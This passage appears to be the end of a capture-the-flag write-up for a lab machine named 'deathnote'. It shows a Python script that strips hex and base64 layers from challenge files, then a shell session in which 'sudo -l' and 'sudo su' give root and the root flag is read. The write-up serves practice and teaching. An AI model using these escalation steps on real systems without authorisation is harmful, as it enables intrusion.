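# Hex bytes optionally separated by spaces, colons, commas or dashes.
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}[\s:,-]*)+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)


def looks_printable(text: str) -> bool:
    return bool(text) and all(c in PRINTABLE for c in text)


def decode_step(data: str):
    """Try to strip one encoding layer. Returns (layer, text) or None."""
    s = data.strip()
    if HEX_RE.match(s):
        raw = bytes.fromhex(re.sub(r"[\s:,-]", "", s))
        text = raw.decode("utf-8", errors="replace")
        if looks_printable(text):
            return "hex", text
    if B64_RE.match(s) and len(s) % 4 == 0:
        try:
            text = base64.b64decode(s, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None
        if looks_printable(text):
            return "base64", text
    return None


def peel(data: str, max_layers: int = 8):
    """Repeatedly strip layers until the text is no longer recognisably
    encoded. Returns (list of layer names, final text)."""
    chain = []
    current = data
    for _ in range(max_layers):
        step = decode_step(current)
        if step is None:
            break
        chain.append(step[0])
        current = step[1]
    return chain, current


def decode_kira_txt():
    return peel(KIRA_TXT)


def decode_case_wav():
    return peel(CASE_WAV)


if __name__ == "__main__":
    for name, fn in (("kira.txt", decode_kira_txt), ("case.wav", decode_case_wav)):
        layers, text = fn()
        print(f"{name}: layers={layers!r}\n{text}")
```

The printable-text check is the stop condition; a plain English word such as "kira" matches the base64 alphabet but decodes to non-printable bytes, so it is left alone.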
Run sudo -l command to list the allowed and forbidden commands for the invoking user on the current host.
kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$
Kira may run any command with sudo, which means we can escalate to the highest privilege. To obtain the root flag, change directory to /root.
kira@deathnote:/opt/L/fake-notebook-rule$ cd /root
bash: cd: /root: Permission denied
kira@deathnote:/opt/L/fake-notebook-rule$ sudo su
root@deathnote:/opt/L/fake-notebook-rule# cd /root
root@deathnote:~# ls
root.txt
root@deathnote:~# cat root.txt
:::::::: :::::::: :::: ::: :::::::: ::::::::: ::: ::::::::::: ::::::::
:+: :+: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#+ +:+ +#+ +:+ +#+ :#: +#++:++#: +#++:++#++: +#+ +#++:++#++
+#+ +#+ +#+ +#+ +#+#+# +#+ +#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######## ######## ### #### ######## ### ### ### ### ### ########
##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~#
Congratulations on completing the CTF challenge!